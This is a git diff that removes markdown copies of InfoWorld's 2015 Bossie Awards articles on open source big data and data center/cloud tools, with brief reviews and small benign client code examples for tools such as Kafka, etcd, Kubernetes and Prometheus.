-Although stable and mature for several years, [Hive][17] reached the 1.0 version milestone this year and continues to be the best solution when really heavy SQL lifting (many petabytes) is required. The community continues to focus on improving the speed, scale, and SQL compliance of Hive. Now at version 1.2, Hive has seen significant improvements since its last Bossie, including full ACID semantics, cross-data center replication, and a cost-based optimizer.
-
-Hive 1.2 also brought improved SQL compliance, making it easier for organizations to use it to off-load ETL jobs from their existing data warehouses. In the pipeline are speed improvements with an in-memory cache called LLAP (which, from the looks of the JIRAs, is about ready for release), the integration of Spark machine learning libraries, and improved SQL constructs like nonequi joins, interval types, and subqueries.
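-
-Because HiveServer2 speaks Thrift, submitting that SQL from code is straightforward in most languages. A hedged sketch using the third-party PyHive library, assuming HiveServer2 on its default port 10000; the web_logs table is a made-up example:
-
-    # pip install pyhive[hive]; assumes HiveServer2 on localhost:10000.
-    from pyhive import hive
-
-    conn = hive.connect(host="localhost", port=10000, username="hive")
-    cursor = conn.cursor()
-    cursor.execute("SELECT status, COUNT(*) FROM web_logs GROUP BY status")
-    for status, hits in cursor.fetchall():
-        print(status, hits)
-    cursor.close()
-    conn.close()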
-
--- Steven Nunez
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-kylin-100613955-orig.jpg)
-
-### Kylin ###
-
-[Kylin][18] is an application developed at eBay for processing very large OLAP cubes via ANSI SQL, a task familiar to most data analysts. If you think about how many items are on sale now and in the past at eBay, and all the ways eBay might want to slice and dice data related to those items, you will begin to understand the types of queries Kylin was designed for.
-
-Like most other analysis applications, Kylin supports multiple access methods, including JDBC, ODBC, and a REST API for programmatic access. Although Kylin is still in incubation at Apache and its community is nascent, the project is well documented and the developers are responsive and eager to understand customer use cases. Getting up and running with a starter cube was a snap. If you need to analyze extremely large cubes, you should take a look at Kylin.
-
--- Steven Nunez
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-cdap-100613945-orig.jpg)
-
-### CDAP ###
-
-[CDAP][19] (Cask Data Application Platform) is a framework running on top of Hadoop that abstracts away the complexity of building and running big data applications. CDAP is organized around two core abstractions: data and applications. CDAP Datasets are logical representations of data that behave uniformly regardless of the underlying storage layer; CDAP Streams provide similar support for real-time data.
-
-Applications use CDAP services for things such as distributed transactions and service discovery to shield developers from the low-level details of Hadoop. CDAP comes with a data ingestion framework and a few prebuilt applications and “packs” for common tasks like ETL and website analytics, along with support for testing, debugging, and security. Like most formerly commercial (closed source) projects, CDAP benefits from good documentation, tutorials, and examples.
-
--- Steven Nunez
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-ranger-100613960-orig.jpg)
-
-### Ranger ###
-
-Security has long been a sore spot with Hadoop. It isn’t (as is frequently reported) that Hadoop is “insecure” or “has no security.” Rather, the truth was more that Hadoop had too much security, though not in a good way. I mean that every component had its own authentication and authorization implementation that wasn’t integrated with the rest of the platform.
-
-Hortonworks acquired XA/Secure in May, and [a few renames later][20] we have [Ranger][21]. Ranger pulls many of the key components of Hadoop together under one security umbrella, allowing you to set a “policy” that ties your Hadoop security to your existing ACL-based Active Directory authentication and authorization. Ranger gives you one place to manage Hadoop access control, one place to audit, one place to manage the encryption, and a pretty Web page to do it from.
-
--- Andrew C. Oliver
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-mesos-100613957-orig.jpg)
-
-### Mesos ###
-
-[Mesos][22], developed at the [AMPLab][23] at U.C. Berkeley, the same lab that brought us Spark, takes a different approach to managing cluster computing resources. The best way to describe Mesos is as a distributed microkernel for the data center. Mesos provides a minimal set of operating system mechanisms like inter-process communications, disk access, and memory to higher-level applications, called “frameworks” in Mesos-speak, that run in what is analogous to user space. Popular frameworks for Mesos include [Chronos][24] and [Aurora][25] for building ETL pipelines and job scheduling, and a few big data processing applications including Hadoop, Storm, and Spark, which have been ported to run as Mesos frameworks.
-
-Mesos applications (frameworks) negotiate for cluster resources using a two-level scheduling mechanism, so writing a Mesos application is unlikely to feel like a familiar experience to most developers. Although Mesos is a young project, momentum is growing, and with Spark being an exceptionally good fit for Mesos, we're likely to see more from Mesos in the coming years.
-
--- Steven Nunez
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-nifi-100613958-orig.jpg)
-
-### NiFi ###
-
-[NiFi][26] is an incubating Apache project to automate the flow of data between systems. It doesn't operate in the traditional space that Kafka and Storm do, but rather in the space between external devices and the data center. NiFi was originally developed by the NSA and donated to the open source community in 2014. It has a strong community of developers and users within various government agencies.
-
-NiFi isn't like anything else in the current big data ecosystem. It is much closer to a traditional EAI (enterprise application integration) tool than a data processing platform, although simple transformations are possible. One interesting feature is the ability to debug and change data flows in real time. Although not quite a REPL (read, eval, print loop), this kind of paradigm dramatically shortens the development cycle by not requiring a compile-deploy-test-debug workflow. Other interesting features include a strong “chain of custody,” where each piece of data can be tracked from beginning to end, along with any changes made along the way. You can also prioritize data flows so that time-sensitive information can be received as quickly as possible, bypassing less time-critical events.
-
--- Steven Nunez
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-kafka-100613954-orig.jpg)
-
-### Kafka ###
-
-[Kafka][27] has emerged as the de facto standard for distributed publish-subscribe messaging in the big data space. Its design allows brokers to support thousands of clients at high rates of sustained message throughput, while maintaining durability through a distributed commit log. Kafka does this by maintaining what is essentially a single append-only log, partitioned across the brokers and replicated to multiple nodes. Because each partition keeps redundant copies, Kafka is protected against the failure of any single broker.
-
-When consumers want to read messages, Kafka looks up their offset in the log and serves the messages from that point onward. Because messages are not deleted immediately, adding consumers or replaying historical messages does not impose additional costs. Kafka has been benchmarked at 2 million writes per second by its developers at LinkedIn. Despite its sub-1.0 version number, Kafka is a mature and stable product, in use in some of the largest clusters in the world.
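-
-A producer and consumer fit in a few lines of any client language. Here is a minimal round trip using the third-party kafka-python package; the broker address and topic name are illustrative assumptions:
-
-    # pip install kafka-python; assumes a broker on localhost:9092.
-    from kafka import KafkaProducer, KafkaConsumer
-
-    producer = KafkaProducer(bootstrap_servers="localhost:9092")
-    producer.send("events", b"user-42 logged in")
-    producer.flush()
-
-    # Read the topic from the beginning; stop after 5 idle seconds.
-    consumer = KafkaConsumer("events",
-                             bootstrap_servers="localhost:9092",
-                             auto_offset_reset="earliest",
-                             consumer_timeout_ms=5000)
-    for message in consumer:
-        print(message.offset, message.value)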
-
--- Steven Nunez
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-opentsdb-100613959-orig.jpg)
-
-### OpenTSDB ###
-
-[OpenTSDB][28] is a time series database built on HBase. It was designed specifically for analyzing data collected from applications, mobile devices, networking equipment, and other hardware devices. The custom HBase schema used to store the time series data has been designed for fast aggregations and minimal storage requirements.
-
-By using HBase as the underlying storage layer, OpenTSDB gains the distributed and reliable characteristics of that system. Users don't interact with HBase directly; instead events are written to the system via the time series daemon (TSD), which can be scaled out as required to handle high-throughput situations. There are a number of prebuilt connectors to publish data to OpenTSDB, and clients to read data from Ruby, Python, and other languages. OpenTSDB isn't strong on creating interactive graphics, but several third-party tools fill that gap. If you are already using HBase and want a simple way to store event data, OpenTSDB might be just the thing.
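-
-Writes go through that same TSD interface. As a hedged sketch, here is a single data point pushed over the HTTP API with plain Python, assuming a TSD on OpenTSDB's default port 4242; the metric and tag names are made up for illustration:
-
-    import time
-    import requests
-
-    point = {
-        "metric": "sys.cpu.user",       # hypothetical metric name
-        "timestamp": int(time.time()),
-        "value": 42.5,
-        "tags": {"host": "web01"},      # OpenTSDB requires at least one tag
-    }
-    resp = requests.post("http://localhost:4242/api/put", json=[point])
-    print(resp.status_code)  # 204 indicates the point was accepted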
-
--- Steven Nunez
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-jupyter-100613953-orig.jpg)
-
-### Jupyter ###
-
-Everybody's favorite notebook application went generic. [Jupyter][29] is “the language-agnostic parts of IPython” spun out into an independent package. Although Jupyter itself is written in Python, the system is modular. Now you can have an IPython-like interface, along with notebooks for sharing code, documentation, and data visualizations, for nearly any language you like.
-
-At least [50 language kernels][30] are already supported, including LISP, R, Ruby, F#, Perl, and Scala. In fact, even IPython itself is simply a Python module for Jupyter. Communication with the language kernel is via a REPL (read, eval, print loop) protocol, similar to [nREPL][31] or [Slime][32]. It is nice to see such a useful piece of software receiving significant [nonprofit funding][33] to further its development in areas such as parallel execution and multi-user notebooks. Behold, open source at its best.
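-
-That kernel protocol is scriptable, too. The sketch below drives a kernel directly with the jupyter_client package, assuming a standard python3 kernelspec is installed; it is the same message flow a notebook front end uses:
-
-    from queue import Empty
-    from jupyter_client.manager import start_new_kernel
-
-    km, kc = start_new_kernel(kernel_name="python3")
-    msg_id = kc.execute("6 * 7")
-    while True:
-        try:
-            msg = kc.get_iopub_msg(timeout=10)
-        except Empty:
-            break
-        if msg["parent_header"].get("msg_id") != msg_id:
-            continue
-        if msg["msg_type"] == "execute_result":
-            print(msg["content"]["data"]["text/plain"])  # prints 42
-        elif msg["msg_type"] == "status" and msg["content"]["execution_state"] == "idle":
-            break
-
-    kc.stop_channels()
-    km.shutdown_kernel()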
-
--- Steven Nunez
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-zeppelin-100613963-orig.jpg)
-
-### Zeppelin ###
-
-While still in incubation, [Apache Zeppelin][34] is nevertheless stirring the data analytics and visualization pot. The Web-based notebook enables users to ingest, discover, analyze, and visualize their data. The notebook also allows you to collaborate with others to make data-driven, interactive documents incorporating a growing number of programming languages.
-
-This technology also boasts an integration with Spark and an interpreter concept allowing any language or data processing back end to be plugged into Zeppelin. Currently Zeppelin supports interpreters such as Scala, Python, SparkSQL, Hive, Markdown, and Shell.
-
-Zeppelin is still immature. I wanted to put a demo up but couldn’t find an easy way to disable “shell” as an execution option (among other things). However, it already looks better visually than IPython Notebook, which is the popular incumbent in this space. If you don’t want to spring for Databricks Cloud or need something open source and extensible, this is the most promising distributed computing notebook around -- especially if you’re a Sparky type.
-
--- Andrew C. Oliver
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-main-100613956-orig.jpg)
-
-### Read about more open source winners ###
-
-InfoWorld's Best of Open Source Awards for 2015 celebrate more than 100 open source projects, from the bottom of the stack to the top. Follow these links to more open source winners:
-
-[Bossie Awards 2015: The best open source applications][35]
-
-[Bossie Awards 2015: The best open source application development tools][36]
-
-[Bossie Awards 2015: The best open source big data tools][37]
-
-[Bossie Awards 2015: The best open source data center and cloud software][38]
-
-[Bossie Awards 2015: The best open source desktop and mobile software][39]
-
-[Bossie Awards 2015: The best open source networking and security software][40]
-
---------------------------------------------------------------------------------
-
-via: http://www.infoworld.com/article/2982429/open-source-tools/bossie-awards-2015-the-best-open-source-big-data-tools.html
-
-作者:[InfoWorld staff][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.infoworld.com/author/InfoWorld-staff/
-[1]:https://spark.apache.org/
-[2]:http://spark-packages.org/
-[3]:https://storm.apache.org/
-[4]:https://lmax-exchange.github.io/disruptor/
-[5]:http://h2o.ai/product/
-[6]:https://www.datatorrent.com/apex/
-[7]:https://github.com/DataTorrent/Malhar
-[8]:https://druid.io/
-[9]:https://flink.apache.org/
-[10]:https://www.elastic.co/products/elasticsearch
-[11]:http://lucene.apache.org/
-[12]:http://slamdata.com/
-[13]:https://drill.apache.org/
-[14]:http://research.google.com/pubs/pub36632.html
-[15]:http://hbase.apache.org/
-[16]:http://phoenix.apache.org/
-[17]:https://hive.apache.org/
-[18]:https://kylin.incubator.apache.org/
-[19]:http://cdap.io/
-[20]:http://www.infoworld.com/article/2973381/application-development/apache-ranger-chuck-norris-hadoop-security.html
-[21]:https://ranger.incubator.apache.org/
-[22]:http://mesos.apache.org/
-[23]:https://amplab.cs.berkeley.edu/
-[24]:http://nerds.airbnb.com/introducing-chronos/
-[25]:http://aurora.apache.org/
-[26]:http://nifi.apache.org/
-[27]:https://kafka.apache.org/
-[28]:http://opentsdb.net/
-[29]:http://jupyter.org/
-[30]:https://github.com/ipython/ipython/wiki/IPython-kernels-for-other-languages
-[31]:https://github.com/clojure/tools.nrepl
-[32]:https://github.com/slime/slime
-[33]:http://blog.jupyter.org/2015/07/07/jupyter-funding-2015/
-[34]:https://zeppelin.incubator.apache.org/
-[35]:http://www.infoworld.com/article/2982622/bossie-awards-2015-the-best-open-source-applications.html
-[36]:http://www.infoworld.com/article/2982920/bossie-awards-2015-the-best-open-source-application-development-tools.html
-[37]:http://www.infoworld.com/article/2982429/bossie-awards-2015-the-best-open-source-big-data-tools.html
-[38]:http://www.infoworld.com/article/2982923/bossie-awards-2015-the-best-open-source-data-center-and-cloud-software.html
-[39]:http://www.infoworld.com/article/2982630/bossie-awards-2015-the-best-open-source-desktop-and-mobile-software.html
-[40]:http://www.infoworld.com/article/2982962/bossie-awards-2015-the-best-open-source-networking-and-security-software.html
\ No newline at end of file
diff --git a/sources/share/20151028 Bossie Awards 2015--The best open source data center and cloud software.md b/sources/share/20151028 Bossie Awards 2015--The best open source data center and cloud software.md
deleted file mode 100644
index 5640c75137..0000000000
--- a/sources/share/20151028 Bossie Awards 2015--The best open source data center and cloud software.md
+++ /dev/null
@@ -1,261 +0,0 @@
-Bossie Awards 2015: The best open source data center and cloud software
-================================================================================
-InfoWorld's top picks of the year in open source platforms, infrastructure, management, and orchestration software
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-data-center-cloud-100613986-orig.jpg)
-
-### The best open source data center and cloud software ###
-
-You might have heard about this new thing called Docker containers. Developers love them because you can build them with a script, add services in layers, and push them right from your MacBook Pro to a server for testing. It works because they're superlightweight, unlike those now-archaic virtual machines. Containers -- and other lightweight approaches to deliver services -- are changing the shape of operating systems, applications, and the tools to manage them. Our Bossie winners in data center and cloud are leading the charge.
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-docker-100613987-orig.jpg)
-
-### Docker Machine, Compose, and Swarm ###
-
-Docker’s open source container technology has been adopted by the major public clouds and is being built into the next version of Windows Server. Allowing developers and operations teams to separate applications from infrastructure, Docker is a powerful data center automation tool.
-
-However, containers are only part of the Docker story. Docker also provides a series of tools that allow you to use the Docker API to automate the entire container lifecycle, as well as to handle application design and orchestration.
-
-[Machine][1] allows you to automate the provisioning of Docker containers. Starting with a command line, you can use a single line of code to target one or more hosts, deploy the Docker engine, and even join it to a Swarm cluster. There’s support for most hypervisors and cloud platforms -- all you need are your access credentials.
-
-[Swarm][2] handles clustering and scheduling, and it can be integrated with Mesos for more advanced scheduling capabilities. You can use Swarm to build a pool of container hosts, allowing your apps to scale out as demand increases. Applications and all of their dependencies can be defined with [Compose][3], which lets you link containers together into a distributed application and launch them as a group. Compose descriptions work across platforms, so you can take a developer configuration and quickly deploy in production.
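-
-The Docker API these tools automate is just as easy to reach from your own scripts. A small sketch with the third-party docker-py library (its client class was named Client in the 2015-era releases), listing running containers over the default Unix socket:
-
-    from docker import Client
-
-    # Assumes the Docker daemon is listening on its default Unix socket.
-    cli = Client(base_url="unix://var/run/docker.sock")
-    for container in cli.containers():
-        print(container["Id"][:12], container["Image"], container["Status"])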
-
--- Simon Bisson
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-coreos-rkt-100613985-orig.jpg)
-
-### CoreOS and Rkt ###
-
-A thin, lightweight server OS, [CoreOS][4] is based on Google’s Chromium OS. Instead of using a package manager to install functions, it’s designed to be used with Linux containers. By using containers to extend a thin core, CoreOS allows you to quickly deploy applications, working well on cloud infrastructures.
-
-CoreOS’s container management tooling, fleet, is designed to treat a cluster of CoreOS servers as a single unit, with tools for managing high availability and for deploying containers to the cluster based on resource availability. A cross-cluster key/value store, etcd, handles device management and supports service discovery. If a node fails, etcd can quickly restore state on a new replica, giving you a distributed configuration management platform that’s linked to CoreOS’s automated update service.
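-
-Because etcd exposes its key/value store over plain HTTP, wiring it into scripts is trivial. A sketch against the v2 API, assuming a local etcd on its default client port 2379; the key and value are illustrative:
-
-    import requests
-
-    # Publish a service endpoint...
-    requests.put("http://127.0.0.1:2379/v2/keys/services/web",
-                 data={"value": "10.0.0.7:8080"})
-
-    # ...and read it back for discovery.
-    node = requests.get("http://127.0.0.1:2379/v2/keys/services/web").json()["node"]
-    print(node["key"], "=", node["value"])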
-
-While CoreOS is perhaps best known for its Docker support, the CoreOS team is developing its own container runtime, rkt, with its own container format, the App Container Image. Also compatible with Docker containers, rkt has a modular architecture that allows different containerization systems (even hardware virtualization, in a proof of concept from Intel) to be plugged in. However, rkt is still in the early stages of development, so it isn’t quite production-ready.
-
--- Simon Bisson
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-rancheros-100613997-orig.jpg)
-
-### RancherOS ###
-
-As we abstract more and more services away from the underlying operating system using containers, we can start thinking about what tomorrow’s operating system will look like. Similar to our applications, it’s going to be a modular set of services running on a thin kernel, self-configuring to offer only the services our applications need.
-
-[RancherOS][5] is a glimpse of what that OS might look like. Blending the Linux kernel with Docker, RancherOS is a minimal OS suitable for hosting container-based applications in cloud infrastructures. Instead of using standard Linux packaging techniques, RancherOS leverages Docker to host Linux user-space services and applications in separate container layers. A low-level Docker instance is first to boot, hosting system services in their own containers. Users' applications run in a higher-level Docker instance, separate from the system containers. If one of your containers crashes, the host keeps running.
-
-RancherOS is only 20MB in size, so it's easy to replicate across a data center. It’s also designed to be managed using automation tools, not manually, with API-level access that works with Docker’s management tools as well as with Rancher Labs’ own cloud infrastructure and management tools.
-
--- Simon Bisson
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-kubernetes-100613991-orig.jpg)
-
-### Kubernetes ###
-
-Google’s [Kubernetes][6] container orchestration system is designed to manage and run applications built in Docker and Rocket containers. Focused on managing microservice applications, Kubernetes lets you distribute your containers across a cluster of hosts, while handling scaling and ensuring managed services run reliably.
-
-With containers providing an application abstraction layer, Kubernetes is an application-centric management service that supports many modern development paradigms, with a focus on user intent. That means you launch applications, and Kubernetes will manage the containers to run within the parameters you set, using the Kubernetes scheduler to make sure it gets the resources it needs. Containers are grouped into pods and managed by a replication engine that can recover failed containers or add more pods as applications scale.
-
-Kubernetes powers Google’s own Container Engine, and it runs on a range of other cloud and data center services, including AWS and Azure, as well as vSphere and Mesos. Containers can be either loosely or tightly coupled, so applications not designed for cloud PaaS operations can be migrated to the cloud as a tightly coupled set of containers. Kubernetes also supports rapid deployment of applications to a cluster, giving you an endpoint for a continuous delivery process.
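-
-All of that cluster state is served from a JSON API. As a sketch, run kubectl proxy (which serves the authenticated API on localhost:8001 by default), then list the pods in the default namespace with nothing more than Python and requests:
-
-    import requests
-
-    # Assumes `kubectl proxy` is running on its default port.
-    url = "http://localhost:8001/api/v1/namespaces/default/pods"
-    for pod in requests.get(url).json()["items"]:
-        print(pod["metadata"]["name"], pod["status"].get("phase"))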
-
--- Simon Bisson
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-mesos-100613993-orig.jpg)
-
-### Mesos ###
-
-Turning a data center into a private or public cloud requires more than a hypervisor. It requires a new operating layer that can manage the data center resources as if they were a single computer, handling resources and scheduling. Described as a “distributed systems kernel,” [Apache Mesos][7] allows you to manage thousands of servers, using containers to host applications and APIs to support parallel application development.
-
-At the heart of Mesos is a set of daemons that expose resources to a central scheduler. Tasks are distributed across nodes, taking advantage of available CPU and memory. One key approach is the ability for applications to reject offered resources if they don’t meet requirements. It’s an approach that works well for big data applications, and you can use Mesos to run Hadoop and Cassandra distributed databases, as well as Apache’s own Spark data processing engine. There’s also support for the Jenkins continuous integration server, allowing you to run build and test workers in parallel on a cluster of servers, dynamically adjusting the tasks depending on workload.
-
-Designed to run on Linux and Mac OS X, Mesos has also recently been ported to Windows to support the development of scalable parallel applications on Azure.
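-
-For a feel of what the master knows, its state endpoint returns the whole cluster picture as JSON. A sketch assuming a master on the default port 5050:
-
-    import requests
-
-    state = requests.get("http://localhost:5050/master/state.json").json()
-    print("activated slaves:", state.get("activated_slaves"))
-    for framework in state.get("frameworks", []):
-        print(framework["name"], framework["id"])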
-
--- Simon Bisson
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-smartos-100614849-orig.jpg)
-
-### SmartOS and SmartDataCenter ###
-
-Joyent’s [SmartDataCenter][8] is the software that runs its public cloud, adding a management platform on top of its [SmartOS][9] thin server OS. A descendant of OpenSolaris that combines Zones containers and the KVM hypervisor, SmartOS is an in-memory operating system, quick to boot from a USB stick and run on bare-metal servers.
-
-Using SmartOS, you can quickly deploy a set of lightweight servers that can be programmatically managed via a set of JSON APIs, with functionality delivered via virtual machines, downloaded by built-in image management tools. Through the use of VMs, all userland operations are isolated from the underlying OS, reducing the security exposure of both the host and guests.
-
-SmartDataCenter runs on SmartOS servers, with one server running as a dedicated management node, and the rest of the cluster operating as compute nodes. You can get started with a Cloud On A Laptop build (available as a VMware virtual appliance) that lets you experiment with the management server. In a live data center, you’ll deploy SmartOS on your servers, using ZFS to handle storage – which includes your local image library. Services are deployed as images, with components stored in an object repository.
-
-The combination of SmartDataCenter and SmartOS builds on the experience of Joyent’s public cloud, giving you a tried and tested set of tools that can help you bootstrap your own cloud data center. It’s an infrastructure focused on virtual machines today, but laying the groundwork for tomorrow. A related Joyent project, [sdc-docker][10], exposes an entire SmartDataCenter cluster as a single Docker host, driven by native Docker commands.
-
--- Simon Bisson
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-sensu-100614850-orig.jpg)
-
-### Sensu ###
-
-Managing large-scale data centers isn’t about working with server GUIs; it’s about automating scripts based on information from monitoring tools and services, routing information from sensors and logs, and then delivering actions to applications. One tool that’s beginning to offer this functionality is [Sensu][11], often described as a “monitoring router.”
-
-Scripts running across your data center deliver information to Sensu, which then routes it to the appropriate handler, using a publish-and-subscribe architecture based on RabbitMQ. Servers can be distributed, delivering published check results to handler code. You might see results in email, or in a Slack room, or in Sensu’s own dashboards. Message formats are defined in JSON files, or mutators are used to format data on the fly, and messages can be filtered to one or more event handlers.
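-
-The checks themselves follow the Nagios plugin convention: print one line of status and exit 0 for OK, 1 for warning, 2 for critical. A sketch of a disk-space check a Sensu client could schedule; the 90 and 95 percent thresholds are arbitrary examples:
-
-    #!/usr/bin/env python
-    import os
-    import sys
-
-    stats = os.statvfs("/")
-    pct_used = 100 * (1 - stats.f_bavail / float(stats.f_blocks))
-
-    if pct_used >= 95:
-        print("CheckDisk CRITICAL: %.1f%% used" % pct_used)
-        sys.exit(2)  # critical
-    elif pct_used >= 90:
-        print("CheckDisk WARNING: %.1f%% used" % pct_used)
-        sys.exit(1)  # warning
-    print("CheckDisk OK: %.1f%% used" % pct_used)
-    sys.exit(0)      # all clear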
-
-Sensu is still a relatively young tool, but it’s one that shows a lot of promise. If you’re going to automate your data center, you’re going to need a tool like this not only to show you what’s happening, but to deliver that information where it’s most needed. A commercial option adds support for integration with third-party applications, but much of what you need to manage a data center is in the open source release.
-
--- Simon Bisson
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-prometheus-100613996-orig.jpg)
-
-### Prometheus ###
-
-Managing a modern data center is a complex task. Racks of servers need to be treated like cattle rather than pets, and you need a monitoring system designed to handle hundreds and thousands of nodes. Monitoring applications presents special challenges, and that’s where [Prometheus][12] comes into play. A service monitoring system designed to deliver alerts to operators, Prometheus can run on everything from a single laptop to a highly available cluster of monitoring servers.
-
-Time series data is captured and stored, then compared against patterns to identify faults and problems. You’ll need to expose data on HTTP endpoints, using a YAML file to configure the server. A browser-based reporting tool handles displaying data, with an expression console where you can experiment with queries. Dashboards can be created with a GUI builder, or written using a series of templates, letting you deliver application consoles that can be managed using version control systems such as Git.
-
-Captured data can be managed using expressions, which make it easy to aggregate data from several sources -- for example, letting you bring performance data from a series of Web endpoints into one store. An experimental alert manager module delivers alerts to common collaboration and devops tools, including Slack and PagerDuty. Official client libraries for common languages like Go and Java mean it’s easy to add Prometheus support to your applications and services, while third-party options extend Prometheus to Node.js and .Net.
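-
-Instrumenting a service takes only a few lines. A sketch with the Python client library (pip install prometheus_client); the metric names and port are invented for illustration, and Prometheus would be configured to scrape the /metrics endpoint this exposes:
-
-    import random
-    import time
-    from prometheus_client import Counter, Summary, start_http_server
-
-    REQUESTS = Counter("app_requests_total", "Total requests handled")
-    LATENCY = Summary("app_request_latency_seconds", "Request latency")
-
-    @LATENCY.time()
-    def handle_request():
-        REQUESTS.inc()
-        time.sleep(random.random() / 10)  # stand-in for real work
-
-    if __name__ == "__main__":
-        start_http_server(8000)  # serves http://localhost:8000/metrics
-        while True:
-            handle_request()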
-
--- Simon Bisson
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-elk-100613988-orig.jpg)
-
-### Elasticsearch, Logstash, and Kibana ###
-
-Running a modern data center generates a lot of data, and it requires tools to get information out of that data. That’s where the combination of Elasticsearch, Logstash, and Kibana, often referred to as the ELK stack, comes into play.
-
-Designed to handle scalable search across a mix of content types, including structured and unstructured documents, [Elasticsearch][13] builds on Apache’s Lucene information retrieval tools, with a RESTful JSON API. It’s used to provide search for sites like Wikipedia and GitHub, using a distributed index with automated load balancing and routing.
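-
-That RESTful JSON API means you can index and search with nothing but an HTTP client. A sketch assuming a node on the default port 9200; the index, type, and field names are invented:
-
-    import requests
-
-    base = "http://localhost:9200"
-    doc = {"host": "web01", "level": "error", "message": "disk almost full"}
-    requests.post(base + "/logs/event", json=doc)   # index a document
-    requests.post(base + "/logs/_refresh")          # make it searchable now
-
-    hits = requests.get(base + "/logs/_search",
-                        params={"q": "level:error"}).json()["hits"]["hits"]
-    for hit in hits:
-        print(hit["_source"]["message"])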
-
-Under the fabric of a modern cloud is a physical array of servers, running as VM hosts. Monitoring many thousands of servers needs centralized logs. [Logstash][14] harvests and filters the logs generated by those servers (and by the applications running on them), using a forwarder on each physical and virtual machine. Logstash-formatted data is then delivered to Elasticsearch, giving you a search index that can be quickly scaled as you add more servers.
-
-At a higher level, [Kibana][15] adds a visualization layer to Elasticsearch, providing a Web dashboard for exploring and analyzing the data. Dashboards can be created around custom searches and shared with your team, providing a quick, easy-to-digest devops information feed.
-
--- Simon Bisson
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-ansible-100613984-orig.jpg)
-
-### Ansible ###
-
-Managing server configuration is a key element of any devops approach to managing a modern data center or a cloud infrastructure. Configuration management tooling that takes a desired-state approach simplifies systems management at cloud scale, using server and application descriptions to handle server and application deployment.
-
-[Ansible][16] offers a minimal management service, using SSH to manage Unix nodes and PowerShell to work with Windows servers, with no need to deploy agents. An Ansible Playbook describes the state of a server or service in YAML, deploying Ansible modules to servers that handle configuration and removing them once the service is running. You can use Playbooks to orchestrate tasks -- for example, deploying several Web endpoints with a single script.
-
-It’s possible to make module creation and Playbook delivery part of a continuous delivery process, using build tools to deliver configurations and automate deployment. Ansible can pull in information from cloud service providers, simplifying management of virtual machines and networks. Monitoring tools in Ansible are able to trigger additional deployments automatically, helping manage and control cloud services, as well as working to manage resources used by large-scale data platforms like Hadoop.
-
--- Simon Bisson
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-jenkins-100613990-orig.jpg)
-
-### Jenkins ###
-
-Getting continuous delivery right requires more than a structured way of handling development; it also requires tools for managing test and build. That’s where the [Jenkins][17] continuous integration server comes in. Jenkins works with your choice of source control, your test harnesses, and your build server. It’s a flexible tool, initially designed for working with Java but now extended to support Web and mobile development and even to build Windows applications.
-
-Jenkins is perhaps best thought of as a switching network, shunting files through a test and build process, and responding to signals from the various tools you’re using – thanks to a library of more than 1,000 plug-ins. These include tools for integrating Jenkins with both local Git instances and GitHub so that it's possible to extend a continuous development model into your build and delivery processes.
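-
-The signals flow both ways: Jenkins’ remote API lets your own scripts trigger and inspect builds. A sketch using the third-party python-jenkins library; the server URL, credentials, job name, and parameter are placeholders:
-
-    import jenkins
-
-    server = jenkins.Jenkins("http://localhost:8080",
-                             username="admin", password="secret")
-    server.build_job("webapp-build", {"BRANCH": "release"})
-
-    info = server.get_job_info("webapp-build")
-    print("last build:", info["lastBuild"]["number"])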
-
-Using an automation tool like Jenkins is as much about adopting a philosophy as it is about implementing a build process. Once you commit to continuous integration as part of a continuous delivery model, you’ll be running test and build cycles as soon as code is delivered to your source control release branch – and delivering it to users as soon as it’s in the main branch.
-
--- Simon Bisson
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-nodejs-iojs-100613995-orig.jpg)
-
-### Node.js and io.js ###
-
-Modern cloud applications are built using different design patterns from the familiar n-tier enterprise and Web apps. They’re distributed, event-driven collections of services that can be quickly scaled and can support many thousands of simultaneous users. One key technology in this new paradigm is [Node.js][18], used by many major cloud platforms and easy to install as part of a thin server or container on cloud infrastructure.
-
-Key to the success of Node.js is the Npm package format, which allows you to quickly install extensions to the core Node.js service. These include frameworks like Express and Seneca, which help build scalable applications. A central registry handles package distribution, and dependencies are automatically installed.
-
-While the [io.js][19] fork exposed issues with project governance, it also allowed a group of developers to push forward adding ECMAScript 6 support to an Npm-compatible engine. After reconciliation between the two teams, the Node.js and io.js codebases have been merged, with new releases now coming from the io.js code repository.
-
-Other forks, like Microsoft’s io.js fork to add support for its 64-bit Chakra JavaScript engine alongside Google’s V8, are likely to be merged back into the main branch over the next year, keeping the Node.js platform evolving and cementing its role as the preferred host for cloud-scale microservices.
-
--- Simon Bisson
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-seneca-100613998-orig.jpg)
-
-### Seneca ###
-
-The developers of the [Seneca][20] microservice framework have a motto: “Build it now, scale it later!” It’s an apt maxim for anyone thinking about developing microservices, as it allows you to start small, then add functionality as your service grows.
-
